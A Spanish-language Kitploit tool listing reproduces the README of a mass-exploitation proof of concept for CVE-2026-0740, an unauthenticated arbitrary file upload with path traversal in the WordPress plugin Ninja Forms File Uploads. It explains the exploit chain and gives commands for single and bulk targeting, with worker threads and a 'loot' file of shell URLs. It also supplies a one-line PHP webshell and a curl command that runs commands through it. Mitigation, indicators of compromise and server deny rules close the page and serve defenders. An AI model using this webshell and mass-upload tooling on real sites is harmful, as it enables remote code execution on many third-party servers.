Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-0740-mass — PoC para CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Carga de archivos arbitraria no autenticada que puede conducir a RCE. | Kitploit
Herramientas/GitHubGitHub/exdev994/cve-2026-0740-mass
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubexdev994/cve-2026-0740-mass

CVE-2026-0740-mass

PoC para CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Carga de archivos arbitraria no autenticada que puede conducir a RCE.

Ver Repositorio
11hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-0740 — Motor de Explotación Masiva

Autor: 0xNuts
Colaborador: Cursor
Repositorio: https://github.com/ExDev994/CVE-2026-0740-mass

PoC para CVE-2026-0740: Ninja Forms File Uploads <= 3.3.26 — Subida Arbitraria de Archivos sin Autenticación que puede llevar a RCE.

La vulnerabilidad inicial fue descubierta por Sélim Lanouar (@whattheslime). El PoC del motor de objetivos masivos fue desarrollado por 0xNuts con contribuciones de Cursor.


Descargo de Responsabilidad

Este repositorio se proporciona únicamente para fines de investigación de seguridad y defensivos (pentest autorizado, red team con permiso por escrito, validación de parches y hardening).

  • No lo utilice contra sistemas sin autorización explícita del propietario.
  • El autor no se hace responsable por el mal uso de esta información.

Resumen de la Vulnerabilidad

El plugin Ninja Forms - File Uploads para WordPress es vulnerable a una subida arbitraria de archivos sin autenticación en todas las versiones hasta la 3.3.26 (incluida).

Cadena de explotación:

  1. Un atacante sin autenticación obtiene un nonce de subida a través de la acción AJAX nf_fu_get_new_nonce con un field_id arbitrario.
  2. El manejador nf_fu_upload valida la extensión del archivo subido (p. ej., image.jpg), pero el atacante puede sobrescribir el nombre del archivo de destino mediante el parámetro POST (image_jpg).
  3. El nombre del archivo de destino se pasa a move_uploaded_file() sin la suficiente sanitización → extensión arbitraria + path traversal (../).

El parche completo está disponible en la versión 3.3.27+.


Requisitos Previos

  • Python 3.10+
  • El objetivo debe tener los plugins Ninja Forms y Ninja Forms - File Uploads (<= 3.3.26) instalados y activos
  • No se necesita ningún formulario o campo de subida preexistente

Instalación de Dependencias

Este repositorio solo contiene CVE-2026-0740.py y README.md. Instale las dependencias manualmente:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate          # Linux/macOS/WSL
# .venv\Scripts\activate           # Windows

pip install httpx==0.28.1 socksio==1.0.0

Modo de Uso

Ayuda de CLI

root@kitploit:~
python3 CVE-2026-0740.py -h

Opciones de Argumentos

Nota: Es obligatorio usar exactamente uno de -t o -f.


Modo Objetivo Único

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php

Con path traversal explícito:

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php -d ../../../shell.php

Modo Objetivos Múltiples

Cree el archivo target.txt:

root@kitploit:~
http://site1.com
https://site2.com
10.0.0.5
# las líneas de comentario se ignoran

Ejecute:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php

Con ajuste de workers y archivo loot:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php -w 50 -o loot.txt

Las URLs de shell subidas con éxito se escribirán en el archivo loot (modo append).


Ejemplo de Webshell Mínima

root@kitploit:~
echo '<?php system($_GET["cmd"] ?? ""); ?>' > shell.php

Después de una subida exitosa, el script muestra la URL de la shell. Verifique (solo en laboratorio/objetivo autorizado):

root@kitploit:~
curl "http://target.com/wp-content/shell.php?cmd=id"

Detección de Versión del Plugin (Opcional)

root@kitploit:~
httpx -fr -u http://target.com -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+'

Cómo Solucionar (Mitigación)

1. Actualizar el Plugin (Prioridad Principal)

Actualice Ninja Forms - File Uploads a la versión 3.3.27 o superior inmediatamente.

  • WordPress Admin → Plugins → verifique la versión de Ninja Forms - File Uploads
  • Si la actualización automática no está disponible, descargue la versión parcheada del proveedor oficial

2. Verificar el Parche

Después de la actualización:

  • Asegúrese de que la versión del plugin >= 3.3.27
  • Pruebe el endpoint wp-admin/admin-ajax.php con las acciones nf_fu_get_new_nonce / nf_fu_upload — la subida arbitraria debe ser rechazada
  • Vuelva a escanear con un escáner (plantilla Nuclei CVE-2026-0740) para confirmar

3. Indicadores de Compromiso (IoC)

Revise el directorio de subidas de WordPress:

root@kitploit:~
wp-content/uploads/ninja-forms/tmp/
wp-content/uploads/ninja-forms/
wp-content/

Busque archivos extraños: .php, .pht, .phtml, .phar, .html, .svg, .js que no deberían estar allí.

Revise también los logs del servidor web en busca de solicitudes a:

root@kitploit:~
/wp-admin/admin-ajax.php

con parámetros action=nf_fu_get_new_nonce o action=nf_fu_upload.

4. Hardening Adicional

  • WAF / limitación de tasa en /wp-admin/admin-ajax.php para bloquear el abuso de subidas masivas

  • Deshabilitar la ejecución de PHP en el directorio wp-content/uploads/ mediante la configuración del servidor web:

    Apache (.htaccess en uploads/):

    root@kitploit:~
    <FilesMatch "\.php$">
      Require all denied
    </FilesMatch>
    

    Nginx:

    root@kitploit:~
    location ~* /wp-content/uploads/.*\.php$ {
        deny all;
    }
    
  • Principio de mínimo privilegio: asegúrese de que los permisos de archivos de subida no sean editables por el servidor web fuera de los directorios necesarios

  • Monitoreo: alerte sobre POST a admin-ajax.php con acciones nf_fu_* desde IPs externas o con alto volumen

  • Copia de seguridad y respuesta a incidentes: si se encuentran IoC, aísle el sitio, rote credenciales de DB/administrador, audite otros plugins/themes

5. Si el Plugin No se Utiliza

Desactive y elimine el plugin Ninja Forms - File Uploads si la funcionalidad de subida no es necesaria.


Referencias

  • CVE-2026-0740
  • Lexfo — Inmersión Técnica Profunda
  • Wordfence — 50,000 Sitios WordPress Afectados
  • GHSA-v8wq-rjpf-669f
  • Plantilla Nuclei
Descargar herramienta
Vector / Extensión<= 3.3.243.3.253.3.263.3.27
Path traversal (../)PASA---
.phpPASA---
.phtml, .pharPASAPASA--
.phtPASAPASAPASA-
.html, .svg, .jsPASAPASAPASA-
BanderínFunción
-t, --targetObjetivo único (URL única)
-f, --targets-fileArchivo .txt con lista de objetivos (una URL por línea)
--shellArchivo payload/webshell a subir (obligatorio)
-d, --destPath traversal de destino (por defecto: ../../../)
-w, --workersNúmero de hilos concurrentes (por defecto: 20)
-o, --outputArchivo loot para URLs de shell exitosas (por defecto: results.txt)
-x, --proxyProxy HTTP (p. ej., http://127.0.0.1:8080)
-H, --headersCabeceras personalizadas (formato: 'Header: Value')
--timeoutTimeout HTTP en segundos (por defecto: 10)